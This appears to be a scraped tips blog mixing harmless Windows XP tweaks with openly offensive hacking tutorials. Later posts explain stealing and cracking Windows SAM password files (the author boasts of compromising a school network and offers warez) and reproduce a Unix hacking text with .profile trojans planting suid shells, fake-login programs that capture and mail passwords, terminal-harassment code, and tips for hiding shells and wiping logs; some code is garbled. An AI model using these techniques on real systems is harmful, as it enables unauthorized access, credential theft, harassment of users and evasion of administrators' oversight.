Portable Windows CE is a 'launcher' for the Windows CE device emulator that can run an emulator-based image from a USB keychain.

Download the Windows CE 5.0 Device Emulator.
Code:
http://www.Mcft.com/downloads/details.aspx?FamilyID=A120E012-CA31-4BE9-A3BF-B9BF4F64CE72&displaylang=en

Change "Mcft" in link to what it is supposed to be icon_wink.gif

Extract the emulator to a folder on your hard drive by running "setup /a". The installer will prompt you to specify a directory to extract to . For example: D:\PortableCE

Download this launcher script:
Code:
http://www.furrygoat.com/Software/launchce.cmd.txt

Copy the following launcher script to the directory you extracted the setup to. You'll need to rename the file from launchce.cmd.txt to launchce.cmd
Once you have that set up, just copy the entire D:\PortableCE folder over to your USB keychain.

To launch the emulator, just plug in your USB keychain, navigate to the PortableCE folder, and run launchce.cmd. You should (hopefully) have the emulator fire up.

How To Boot Xp Faster (updated)

2009-02-10T16:59:00.001-06:00

First of all, this tweak only apply to those who only have one HDD on their primary IDE channel (nothing else on device 0 or 1) and a CD-ROM and/or DVD-ROM on the secondary IDE channel. Each time you boot Windows XP, there's an updated file called NTOSBOOT-*.pf who appears in your prefetch directory (%SystemRoot%Prefetch) and there's no need to erease any other files as the new prefetch option in XP really improves loading time of installed programs. We only want WindowsXP to boot faster and not decrease its performance. Thanks to Rod Cahoon (for the prefetch automation process...with a minor change of mine) and Zeb for the IDE Channel tweak as those two tricks, coupled together with a little modification, result in an EXTREMELY fast bootup:

1. Open notepad.exe, type "del c:windowsprefetch tosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.

WindowsXP should now boot REALLY faster.

How To Access Your Folders From Your Taskbar

2009-02-10T16:57:00.000-06:00

This is an easy way to get to the folders on your system without having to open a Windows Explorer Window every time you want to access files. I find it very useful to have this feature as it allows me to access my Folders and Drives immediately and saves me a lot of time.

This works in Windows XP:

1. Right Click an empty spot on your Taskbar (Between your Start Button and your System Tray).
2. Click Toolbars.
3. Click New Toolbar.
4. A Small Window will Open that allows you to pick the folder you wish to make a Toolbar. If you want to access your Desktop Without having to minimize all your windows. Just Pick Desktop. If you want to access ONLY your My Documents Folder, Select that. Any folder will work for this.
5. Click OK.
The New Tool bar will appear at the bottom of your screen next to your System Tray.

If you find this to be not useful, Repeat Steps 1 and 2 and then check click the Toolbar you created that has a check mark next to it. And it will disappear.

How do I remove an extra operating system from by

2009-02-10T16:56:00.000-06:00

If you have more then one operating system installed or wish
to remove an operating system from the boot menu, you can use the following information.

1.Click on Start, Control Panel, System, Advanced.
2.Under Startup and Recovery, click Settings.
3.Under Default Operating System, choose one of the following:

"Microsoft Windows XP Professional /fastdetect"
-or-
"Microsoft Windows XP Home /fasdetect"
-or-
"Microsoft Windows 2000 Professional /fastdetect"

4.Take the checkmark out of the box for "Time to display a list of Operating Systems".
5.Click Apply and Ok, and reboot the system.

*If you wish to edit the boot.ini file manually, click on the button "EDIT"

How to modify *.exe files

2009-02-09T12:52:00.000-06:00

learn how to change *.exe files, in 5 easy steps:

1) Don't try to modify a prog by editing his source in a dissasembler.Why?
Cause that's for programmers and assembly experts only.

try to view it in hex you'll only get tons of crap you don't understand.
First off, you need Resource Hacker(last version). It's a resource editor-
very easy to use, You can download it at h**p://www.users.on.net/johnson/resourcehacker/

2) Unzip the archive, and run ResHacker.exe. You can check out the help file too

3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.

4) In the left side of the screen a list of sections will appear.
The most common sections are
-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.
*Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.
*String table: a bunch of crap, useful sometimes, basic programming knowladge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the programs easy!
*WAV:Change the sounds in the prog. with your own.

5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc.

TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as).
TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure.

How To Make XP Go Faster

2009-02-09T12:49:00.001-06:00

There are quite a few services you can disable from starting automatically.
This would be to speed up your boot time and free resources.
They are only suggestions so I suggestion you read the description of each one when you run Services
and that you turn them off one at a time.

Some possibilities are:
Alerter
Application Management
Clipbook
Fast UserSwitching
Human Interface Devices
Indexing Service
Messenger
Net Logon
NetMeeting
QOS RSVP
Remote Desktop Help Session Manager
Remote Registry
Routing & Remote Access
SSDP Discovery Service
Universal Plug and Play Device Host
Web Client

--------------------------------------------------------------------------------

Cleaning the Prefetch Directory

WindowsXP has a new feature called Prefetch. This keeps a shortcut to recently used programs.
However it can fill up with old and obsolete programs.

To clean this periodically go to:

Star / Run / Prefetch
Press Ctrl-A to highlight all the shorcuts
Delete them

--------------------------------------------------------------------------------

Not Displaying Logon, Logoff, Startup and Shutdown Status Messages

To turn these off:

Start Regedit
Go to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem
If it is not already there, create a DWORD value named DisableStatusMessages
Give it a value of 1

--------------------------------------------------------------------------------
Clearing the Page File on Shutdown

Click on the Start button
Go to the Control Panel
Administrative Tools
Local Security Policy
Local Policies
Click on Security Options
Right hand menu - right click on "Shutdown: Clear Virtual Memory Pagefile"
Select "Enable"
Reboot

For regedit users.....
If you want to clear the page file on each shutdown:

Start Regedit
Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementClearPageFileAtShutdown
Set the value to 1

--------------------------------------------------------------------------------

No GUI Boot

If you don't need to see the XP boot logo,

Run MSCONFIG
Click on the BOOT.INI tab
Check the box for /NOGUIBOOT

---------------------------------------------------------------------------------
Speeding the Startup of Some CD Burner Programs

If you use program other than the native WindowsXP CD Burner software,
you might be able to increase the speed that it loads.

Go to Control Panel / Administrative Tools / Services
Double-click on IMAPI CD-Burning COM Service
For the Startup Type, select Disabled
Click on the OK button and then close the Services window
If you dont You should notice

--------------------------------------------------------------------------------

Getting Rid of Unread Email Messages

To remove the Unread Email message by user's login names:

Start Regedit
For a single user: Go to HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionUnreadMail
For all users: Go to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUnreadMail
Create a DWORD key called MessageExpiryDays
Give it a value of 0

------------------------------------------------------------------------------

Decreasing Boot Time

Microsoft has made available a program to analyze and decrease the time it takes to boot to WindowsXP
The program is called BootVis

Uncompress the file.
Run BOOTVIS.EXE
For a starting point, run Trace / Next Boot + Driver Delays
This will reboot your computer and provide a benchmark
After the reboot, BootVis will take a minute or two to show graphs of your system startup.
Note how much time it takes for your system to load (click on the red vertical line)
Then run Trace / Optimize System
Re-Run the Next Boot + Drive Delays
Note how much the time has decreased
Mine went from approximately 33 to 25 seconds.

--------------------------------------------------------------------------------
Increasing Graphics Performance

By default, WindowsXP turns on a lot of shadows, fades, slides etc to menu items.
Most simply slow down their display.

To turn these off selectively:

Right click on the My Computer icon
Select Properties
Click on the Advanced tab
Under Performance, click on the Settings button
To turn them all of, select Adjust for best performance
My preference is to leave them all off except for Show shadows under mouse pointer and Show window contents while dragging

---------------------------------------------------------------------------

Increasing System Performance

If you have 512 megs or more of memory, you can increase system performance
by having the core system kept in memory.

Start Regedit
Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementDisablePagingExecutive
Set the value to be 1
Reboot the computer

---------------------------------------------------------------------------

Increasing File System Caching

To increase the amount of memory Windows will locked for I/O operations:

Start Regedit
Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management
Edit the key IoPageLockLimit

-----------------------------------------------------------------------------

Resolving Inability to Add or Remove Programs

If a particular user cannot add or remove programs, there might be a simple registry edit neeed.

Go to HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall
Change the DWORD NoAddRemovePrograms to 0 disable it

4096 - 32megs of memory or less
8192 - 32+ megs of memory
16384 - 64+ megs of memory
32768 - 128+ megs of memory
65536 - 256+ megs of memory

HOW TO GET ANY WINDOWS PASSWORD

2009-02-09T12:42:00.000-06:00

ok..... here are the full details.....

this works whether its windows 2000 or windows xp or windows xp SP1 or SP2 or windows server 2003....

this works even if syskey encryption is employed...

if it is FAT filesystem...

just copy the sam file like stated in the first post to an empty floppy disk and take it home. I'll tell u what to do with it later... DON'T DELETE THE ORIGINAL SAM FILE. just remove its attributes. the sam file is a file called SAM with no extension. YOU MUST ALSO GET.... a file called SYSTEM which is in the same folder as SAM. both files have no extensions...

if it is NTFS....

u have to download a program called NTFSPro.... it allows u to read from ntfs drives... the demo version allows read only. the full version is read-write.... you use the program to create an unbootable disk (so u will still need another bootable disk and an empty disk) that has the required files to access NTFS.

use the boot disk to get into dos, then use the disks created with ntfspro to be able to access the filesystem, then copy the SAM and SYSTEM files to another empty disk to take home....

AT HOME: u have to get a program called SAMInside. it doesn't matter if it is demo version. SAMInside will open the SAM file and extract all the user account information and their passwords, including administrator. SAMInside will ask for the SYSTEM file too if the computer you took the SAM file from has syskey enabled. syskey encrypts the SAM file. SAMInside uses SYSTEM file to decrypt the SAM file. After SAMInside finishes, u still see user accounts and hashes beside them. the hashes are the encoded passwords. Use SAMInside to export the accounts and their hashes as a pwdump file into another program, called LophtCrack. it is currently in version 5, it is named LC5. the previous version, LC4 is just as good. u need the full or cracked version of the program. LC5 uses a brute force method by trying all possible combinations of letters numbers, and unprintable characters to find the correct password from the hashes in the pwdump file imported into it from SAMInside. This process of trying all passwords might take 5 minutes if the password is easy, up to a year if the password is long and hard (really really hard). LC5 howver, unlike LC4, is almost 100 times faster. both can be configured to try dictionary and common words before using all possible combinations of everything. Once the correct password is found, it will display the passwords in clear beside each account, including administrator.

I use this method so many times. I've compromised the whole school computer infrastructure. LC4 usually took between 1 second and 10 minutes to find the passwords because they were common words found in any english dictionary. I haven't used LC5 yet.

If there is anything unclear, anything I overlooked, plz tell me so that I can turn this into a very easy to follow tutorial to help anybody crack any windowz pass.

Programs needed: SAMInside (doesn't matter which version or if demo)
LC4 or LC5 (lophtcrack)( must be full version)
NTFSPro (doesn't matter if demo)
any bootdisk maker

Cracked or full version software can be found on any warez site. If u don"t know what that is or where to get the programs, post a message and I'll tell u or give them to u.

P.S: I might not keep track of this forum, because I'm going to create a new topic and post tutorial there. if u want to post, plz post there.

UNIX :HACKING III " Bad Directory Permissions"

2009-02-07T19:40:00.000-06:00

Now, what do I mean for bad directory permissions? Well, look for
files that YOU can write to, and above all, DIRECTORIES you can write to.
If you have write permissions on a file, you can modify it. Now, this comes
in handy when wanting to steal someone's access. If you can write to
a user's .profile, you are in business. You can have that user's .profile
create a suid shell for you to run when You next logon after the user.
If the .profile is writable to you, you can do this:

$ ed .profile
[some number will be here]
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
(control-d)
? w
[new filesize will be shown]
? q
$

Now, when the user next logs on, the .profile will create .runme which
will set your ID to the user whose .profile you changed. Ideally, you'll
go back in and zap those lines after the suid is created, and you'll create
a suid somewhere else, and delete the one in his dir. The .runme will
not appear in the user's REGULAR directory list, it will only show up
if he does "ls -a" (or ls with a -a combination), because, the '.' makes
a file hidden.

The above was a TROJAN HORSE, which is one of the most widely used/abused
method of gaining more power on a unix. The above could be done in C via
the system() command, or by just plain using open(), chmod(), and the like.
* Remember to check and see if the root user's profile is writeable *
* it is located at /.profile (usually) *

The BEST thing that could happen is to find a user's directory writeable
by you. Why? well, you could replace all the files in the directory
with your own devious scripts, or C trojans. Even if a file is not
writeable by you, you can still overwrite it by deleteing it. If you
can read various files, such as the user's .profile, you can make a
self deleting trojan as so:

$ cp .profile temp.pro
$ ed .profile
1234
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
mv temp.pro .profile
(control-d)
? w
[another number]
? q
$ chown that_user temp.pro

What happens is that you make a copy of the .profile before you change it.
Then, you change the original. When he runs it, the steps are made, then
the original version is placed over the current, so if the idiot looks in
his .profile, he won't see anything out of the ordinary, except that he
could notice in a long listing that the change date is very recent, but
most users are not paranoid enough to do extensive checks on their files,
except sysadm files (such as passwd).

Now, remember, even though you can write to a dir, you may not be able
to write to a file without deleting it. If you do not have write perms
for that file, you'll have to delete it and write something in its place
(put a file with the same name there). The most important thing to remember
if you have to delete a .profile is to CHANGE the OWNER back after you
construct a new one (hehe) for that user. He could easily notice that his
.profile was changed and he'll know who did it. YES, you can change the
owner to someone else besides yourself and the original owner (as to throw
him off), but this is not wise as keeping access usually relies on the fact
that they don't know you are around.

You can easily change cron files if you can write to them. I'm not going
to go into detail about cronfile formats here, just find the crontab files
and modify them to create a shell somewhere as root every once in a while,
and set the user-id.

III. Trojan Horses on Detached terminals.
Basically this: You can send garbage to a user's screen and
mess him up bad enough to force a logoff, creating a detached
account. Then you can execute a trojan horse off that terminal in
place of login or something, so the next one who calls can hit the
trojan horse. This USUALLY takes the form of a fake login and
write the username/pw entererred to disk.

Now, there are other trojan horses available for you to write. Now,
don't go thinking about a virus, for they don't work unless ROOT runs
them. Anyway, a common trjan would be a shell script to get the
password, and mail it to you. Now, you can replace the code for
the self deleting trojan with one saying something like:
echo "login: \c"
read lgin
echo off (works on some systems)
(if above not available...: stty -noecho)
echo "Password:\c"
read pw
echo on
echo "Login: $lgin - Pword: $pw" | mail you

Now, the best way to use this is to put it in a seperate script file
so it can be deleted as part of the self deleting trojan. A quick
modification, removing the "login: " and leaving the password
may have it look like SU, so you can get the root password. But
make sure the program deletes itself. Here is a sample trojan
login in C:

#include
/* Get the necessary defs.. */
main()
{
char *name[80];
char *pw[20];
FILE *strm;
printf("login: ");
gets(name);
pw = getpass("Password:");
strm = fopen("/WhereEver/Whateverfile","a");
fprintf(strm,"User: (%s), PW [%s]\n",name,pw);
fclose(strm);
/* put some kind of error below... or something... */
printf("Bus Error - Core Dumped\n");
exit(1);
}

The program gets the login, and the password, and appends it to
a file (/wherever/whateverfile), and creates the file if it can,
and if its not there. That is just an example. Network Annoyances
come later.

IV. Odd systems

There may be systems you can log in to with no problem, and find some
slack menu, database, or word processor as your shell, with no way to the
command interpreter (sh, ksh, etc..). Don't give up here. Some systems will
let you login as root, but give you a menu which will allow you to add an
account. However, ones that do this usually have some purchased software
package running, and the people who made the software KNOW that the people
who bought it are idiots, and the thing will sometimes only allow you to
add accounts with user-id 100 or greater, with their special menushell as
a shell. You probably won't get to pick the shell, the program will probably
stick one on the user you created which is very limiting. HOWEVER, sometimes
you can edit accounts, and it will list accounts you can edit on the screen.
HOWEVER, these programs usually only list those with UIDS > 100 so you don't
edit the good accounts, however, they donot stop you from editing an account
with a UID < 100. The "editing" usually only involves changing the password on the account. If an account has a * for a password, the standard passwd program which changes programs, will say no pw exists, and will ask you to enter one. (wallah! You have just freed an account for yourself. Usually bin and sys have a * for a password). If one exists you'll have to enter the old Password (I hope you know it!) for that account. Then, you are in the same boat as before. (BTW -- These wierd systems are usually Xenix/386, Xenix/286, or Altos/286) With word processors, usually you can select the load command, and when the word processor prompts for a file, you can select the passwd file, to look for open accounts, or at least valid ones to hack. An example would be the informix system. You can get a word processor with that such as Samna word, or something, and those Lamers will not protect against shit like that. Why? The Passwd file HAS to be readable by all for the most part, so each program can "stat" you. However, word processors could be made to restrict editing to a directory, or set of directories. Here is an example: $ id uid=100(sirhack) gid=100(users) $ sword (word processor comes up) (select LOAD A FILE) : /etc/passwd

(you see: )
root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh
sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh
...

Now I have found an account to take over! "datawiz" will get me in with no
trouble, then I can change his password, which he will not like at all.
Some systems leave "sysadm" unpassworded (stupid!), and now, Most versions
of Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell which
will menu drive all the important shit, even creating users, but you must
have ansi or something.

You can usually tell when you'll get a menu. Sometimes on UNIX
SYSTEM V, when it says TERM = (termtype), and is waiting for
you to press return or whatever, you will probably get a menu.. ack.

V. Shadowed Password files
Not much to say about this. all it is, is when every password field
in the password file has an "x" or just a single character. What
that does is screw you, becuase you cannot read the shadowed password
file, only root can, and it contains all the passwords, so you will
not know what accounts have no passwords, etc.

There are a lot of other schemes for hacking unix, lots of others, from
writing assembly code that modifies the PCB through self-changing code which
the interrupt handler doesn't catch, and things like that. However, I do
not want to give away everything, and this was not meant for advanced Unix
Hackers, or atleast not the ones that are familiar with 68xxx, 80386 Unix
assembly language or anything. Now I will Talk about Internet.

--->>> InterNet <<<--- Why do I want to talk about InterNet? Well, because it is a prime example of a TCP/IP network, better known as a WAN (Wide-Area-Network). Now, mainly you will find BSD systems off of the Internet, or SunOS, for they are the most common. They may not be when System V, Rel 4.0, Version 2.0 comes out. Anyway, these BSDs/SunOSs like to make it easy to jump from one computer to another once you are logged in. What happens is EACH system has a "yello page password file". Better known as yppasswd. If you look in there, and see blank passwords you can use rsh, rlogin, etc.. to slip into that system. One system in particular I came across had a a yppasswd file where *300* users had blank passwords in the Yellow Pages. Once I got in on the "test" account, ALL I had to do was select who I wanted to be, and do: rlogin -l user (sometimes -n). Then it would log me onto the system I was already on, through TCP/IP. However, when you do this, remember that the yppasswd only pertains to the system you are on at the time. To find accounts, you could find the yppasswd file and do: % cat yppasswd | grep :: Or, if you can't find yppasswd.. % ypcat passwd | grep :: On ONE system (which will remain confidential), I found the DAEMON account left open in the yppasswd file. Not bad. Anyway, through one system on the internet, you can reach many. Just use rsh, or rlogin, and look in the file: /etc/hosts for valid sites which you can reach. If you get on to a system, and rlogin to somewhere else, and it asks for a password, that just means one of two things: A. Your account that you have hacked on the one computer is on the target computer as well. Try to use the same password (if any) you found the hacked account to have. If it is a default, then it is definitly on the other system, but good luck... B. rlogin/rsh passed your current username along to the remote system, so it was like typing in your login at a "login: " prompt. You may not exist on the other machine. Try "rlogin -l login_name", or rlogin -n name.. sometimes, you can execute "rwho" on another machine, and get a valid account. Some notes on Internet servers. There are "GATEWAYS" that you can get into that will allow access to MANY internet sites. They are mostly run off a modified GL/1 or GS/1. No big deal. They have help files. However, you can get a "privilged" access on them, which will give you CONTROL of the gateway.. You can shut it down, remove systems from the Internet, etc.. When you request to become privileged, it will ask for a password. There is a default. The default is "system". I have come across *5* gateways with the default password. Then again, DECNET has the same password, and I have come across 100+ of those with the default privileged password. CERT Sucks. a Gateway that led to APPLE.COM had the default password. Anyone could have removed apple.com from the internet. Be advised that there are many networks now that use TCP/IP.. Such as BARRNET, LANET, and many other University networks. --** Having Fun **-- Now, if nothing else, you should atleast have some fun. No, I do not mean go trashing hardrives, or unlinking directories to take up inodes, I mean play with online users. There are many things to do. Re-direct output to them is the biggie. Here is an example: $ who loozer tty1 sirhack tty2 $ banner You Suck >/dev/tty1
$
That sent the output to loozer. The TTY1 is where I/O is being performed
to his terminal (usually a modem if it is a TTY). You can repetitiously
banner him with a do while statement in shell, causing him to logoff. Or
you can get sly, and just screw with him. Observe this C program:

#include
#include
#include

main(argc,argument)
int argc;
char *argument[];
{
int handle;
char *pstr,*olm[80];
char *devstr = "/dev/";
int acnt = 2;
FILE *strm;
pstr = "";
if (argc == 1) {
printf("OL (OneLiner) Version 1.00 \n");
printf("By Sir Hackalot [PHAZE]\n");
printf("\nSyntax: ol tty message\n");
printf("Example: ol tty01 You suck\n");
exit(1);
}
printf("OL (OneLiner) Version 1.0\n");
printf("By Sir Hackalot [PHAZE]\n");
if (argc == 2) {
strcpy(olm,"");
printf("\nDummy! You forgot to Supply a ONE LINE MESSAGE\n");
printf("Enter one Here => ");
gets(olm);
}
strcpy(pstr,"");
strcat(pstr,devstr);
strcat(pstr,argument[1]);
printf("Sending to: [%s]\n",pstr);
strm = fopen(pstr,"a");
if (strm == NULL) {
printf("Error writing to: %s\n",pstr);
printf("Cause: No Write Perms?\n");
exit(2);
}
if (argc == 2) {
if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s): \n",logname());
fprintf(strm,"%s\n",olm);
fclose(strm);
printf("Message Sent.\n");
exit(0);
}
if (argc > 2) {
if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s):\n",logname());
while (acnt <= argc - 1) { fprintf(strm,"%s ",argument[acnt]); acnt++; } fclose(strm); printf("Message sent!\n"); exit(0); } } What the above does is send one line of text to a device writeable by you in /dev. If you try it on a user named "sirhack" it will notify sirhack of what you are doing. You can supply an argument at the command line, or leave a blank message, then it will prompt for one. You MUST supply a Terminal. Also, if you want to use ?, or *, or (), or [], you must not supply a message at the command line, wait till it prompts you. Example: $ ol tty1 You Suck! OL (OneLiner) Version 1.00 by Sir Hackalot [PHAZE] Sending to: [/dev/tty1] Message Sent! $ Or.. $ ol tty1 OL (OneLiner) Version 1.00 by Sir Hackalot [PHAZE] Dummy! You Forgot to Supply a ONE LINE MESSAGE! Enter one here => Loozer! Logoff (NOW)!! ^G^G
Sending to: [/dev/tty1]
Message Sent!
$

You can even use it to fake messages from root. Here is another:

/*
* Hose another user
*/

#include
#include
#include
#include
#include
#include
#include
#include

#define NMAX sizeof(ubuf.ut_name)

struct utmp ubuf;
struct termio oldmode, mode;
struct utsname name;
int yn;
int loop = 0;
char *realme[50] = "Unknown";
char *strcat(), *strcpy(), me[50] = "???", *him, *mytty, histty[32];
char *histtya, *ttyname(), *strrchr(), *getenv();
int signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(), timout();
FILE *tf;

main(argc, argv)
int argc;
char *argv[];
{
register FILE *uf;
char c1, lastc;
int goodtty = 0;
long clock = time((long *) 0);
struct tm *localtime();
struct tm *localclock = localtime( &clock );
struct stat stbuf;
char psbuf[20], buf[80], window[20], junk[20];
FILE *pfp, *popen();

if (argc < him =" argv[1];"> 2)
histtya = argv[2];
if ((uf = fopen("/etc/utmp", "r")) == NULL) {
printf("cannot open /etc/utmp\n");
exit(1);
}
cuserid(me);
if (me == NULL) {
printf("Can't find your login name\n");
exit(1);
}
mytty = ttyname(2);
if (mytty == NULL) {
printf("Can't find your tty\n");
exit(1);
}
if (stat(mytty, &stbuf) < histtya =" strrchr(histtya," logcnt="="0)" histtya="="0"> 1) {
printf("%s logged more than once\nwriting to %s\n", him, histty+5);
}
if (access(histty, 0) < 0) { printf("No such tty? [%s]\n",histty); exit(1); } signal(SIGALRM, timout); alarm(5); if ((tf = fopen(histty, "w")) == NULL) goto perm; alarm(0); if (fstat(fileno(tf), &stbuf) < 0) goto perm; if (geteuid() != 0 && (stbuf.st_mode&02) == 0) goto perm; ioctl(0, TCGETA, &oldmode); /* save tty state */ ioctl(0, TCGETA, &mode); sigs(eof); uname(&name); if (strcmp(him,"YOURNAMEHERE") == 0) yn = 1; if (yn == 1 ) { fprintf(tf, "\r(%s attempted to HOSE You with NW)\r\n",me); fclose(tf); printf("Critical Error Handler: %s running conflicting process\n",him); exit(1); } fflush(tf); mode.c_cc[4] = 1; mode.c_cc[5] = 0; mode.c_lflag &= ~ICANON; ioctl(0, TCSETAW, &mode); lastc = '\n'; printf("Backspace / Spin Cursor set lose on: %s\n",him); while (loop == 0) { c1 = '\b'; write(fileno(tf),&c1,1); sleep(5); fprintf(tf,"\\\b|\b/\b-\b+\b"); fflush(tf); } perm: printf("Write Permissions denied!\n"); exit(1); } timout() { printf("Timeout opening their tty\n"); exit(1); } eof() { printf("Bye..\n"); ioctl(0, TCSETAW, &oldmode); exit(0); } ex() { register i; sigs(SIG_IGN); i = fork(); if (i < 0) { printf("Try again\n"); goto out; } if (i == 0) { sigs((int (*)())0); execl(getenv("SHELL")?getenv("SHELL"):"/bin/sh","sh","-t",0); exit(0); } while(wait((int *)NULL) != i) ; printf("!\n"); out: sigs(eof); } sigs(sig) int (*sig)(); { register i; for (i=0; signum[i]; i++) signal(signum[i], sig); } What the above is, is a modified version of the standard write command. What it does, is spin the cursor once, then backspace once over the screen of the user it is run on. All though, it does not physically affect input, the user thinks it does. therefore, he garbles input. The sleep(xx) can be changed to make the stuff happen more often, or less often. If you put your login name in the "YOURNAMEHERE" slot, it will protect you from getting hit by it, if someone off a Public access unix leeches the executable from your directory. You could make a shorter program that does almost the same thing, but you have to supply the terminal, observe: /* Backspace virus, by Sir Hackalot [Phaze] */ #include
#include
main(argc,argv)
char *argv[];
int argc;
{
int x = 1;
char *device = "/dev/";
FILE *histty;
if (argc == 1) {
printf("Bafoon. Supply a TTY.\n");
exit(1);
}
strcat(device,argv[1]);
/* Make the filename /dev/tty.. */
histty = fopen(device,"a");
if (histty == NULL) {
printf("Error opening/writing to tty. Check their perms.\n");
exit(1);
}
printf("BSV - Backspace virus, By Sir Hackalot.\n");
printf("The Sucker on %s is getting it!\n",device);
while (x == 1) {
fprintf(histty,"\b\b");
fflush(histty);
sleep(5);
}
}

Thats all there is to it. If you can write to their tty, you can use this on
them. It sends two backspaces to them every approx. 5 seconds. You
should run this program in the background. (&). Here is an example:

$ who
sirhack tty11
loozer tty12
$ bsv tty12&
[1] 4566
BSV - Backspace virus, by Sir Hackalot
The Sucker on /dev/tty12 is getting it!
$

Now, it will keep "attacking" him, until he loggs of, or you kill the process
(which was 4566 -- when you use &, it gives the pid [usually]).

** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LF
method to terminate a line. However, the LF terminates a line in Unix.
you must STRIP CR's on an ascii upload if you want something you upload
to an editor to work right. Else, you'll see a ^M at the end of every
line. I know that sucks, but you just have to compensate for it.

I have a number of other programs that annoy users, but that is enough to
get your imagination going, provided you are a C programmer. You can annoy
users other ways. One thing you can do is screw up the user's mailbox.
The way to do this is to find a binary file (30k or bigger) on the system
which YOU have access to read. then, do this:

$ cat binary_file | mail loozer

or

$ mail loozer <>/dev/tty12
$
It may pause for a while while it outputs it. If you want to resume what
you were doing instantly, do:
$ cat binary_file >/dev/tty12&
[1] 4690
$
And he will probably logoff. You can send the output of anything to his
terminal. Even what YOU do in shell. Like this:
$ sh >/dev/tty12
$
You'll get your prompts, but you won't see the output of any commands, he
will...
$ ls
$ banner Idiot!
$ echo Dumbass!
$
until you type in exit, or hit ctrl-d.

There are many many things you can do. You can fake a "write" to someone
and make them think it was from somewhere on the other side of hell. Be
creative.

When you are looking for things to do, look for holes, or try to get
someone to run a trojan horse that makes a suid shell. If you get
someone to run a trojan that does that, you can run the suid, and log their
ass off by killing their mother PID. (kill -9 whatever). Or, you can
lock them out by adding "kill -1 0" to their .profile. On the subject of
holes, always look for BAD suid bits. On one system thought to be invincible
I was able to read/modify everyone's mail, because I used a mailer that had
both the GroupID set, and the UserID set. When I went to shell from it,
the program instantly changed my Effective ID back to me, so I would not be
able to do anything but my regular stuff. But it was not designed to change
the GROUP ID back. The sysop had blundered there. SO when I did an ID
I found my group to be "Mail". Mailfiles are readble/writeable by the
user "mail", and the group "mail". I then set up a sgid (set group id) shell
to change my group id to "mail" when I ran it, and scanned important mail,
and it got me some good info. So, be on the look out for poor permissions.

Also, after you gain access, you may want to keep it. Some tips on doing so
is:
1. Don't give it out. If the sysadm sees that joeuser logged in 500
times in one night....then....
2. Don't stay on for hours at a time. They can trace you then. Also
they will know it is irregular to have joeuser on for 4 hours
after work.
3. Don't trash the system. Don't erase important files, and don't
hog inodes, or anything like that. Use the machine for a specific
purpose (to leech source code, develop programs, an Email site).
Dont be an asshole, and don't try to erase everything you can.
4. Don't screw with users constantly. Watch their processes and
run what they run. It may get you good info (snoop!)
5. If you add an account, first look at the accounts already in there
If you see a bunch of accounts that are just 3 letter abbrv.'s,
then make yours so. If a bunch are "cln, dok, wed" or something,
don't add one that is "joeuser", add one that is someone's
full initials.

6. When you add an account, put a woman's name in for the
description, if it fits (Meaning, if only companies log on to the
unix, put a company name there). People do not suspect hackers
to use women's names. They look for men's names.
7. Don't cost the Unix machine too much money. Ie.. don't abuse an
outdial, or if it controls trunks, do not set up a bunch of dial
outs. If there is a pad, don't use it unless you NEED it.
8. Don't use x.25 pads. Their usage is heavily logged.
9. Turn off acct logging (acct off) if you have the access to.
Turn it on when you are done.
10. Remove any trojan horses you set up to give you access when you
get access.
11. Do NOT change the MOTD file to say "I hacked this system" Just
thought I'd tell you. Many MANY people do that, and lose access
within 2 hours, if the unix is worth a spit.
12. Use good judgement. Cover your tracks. If you use su, clean
up the sulog.
13. If you use cu, clean up the cu_log.
14. If you use the smtp bug (wizard/debug), set up a uid shell.
15. Hide all suid shells. Here's how:
goto /usr
(or any dir)
do:
# mkdir ".. "
# cd ".. "
# cp /bin/sh ".whatever"
# chmod a+s ".whatever"
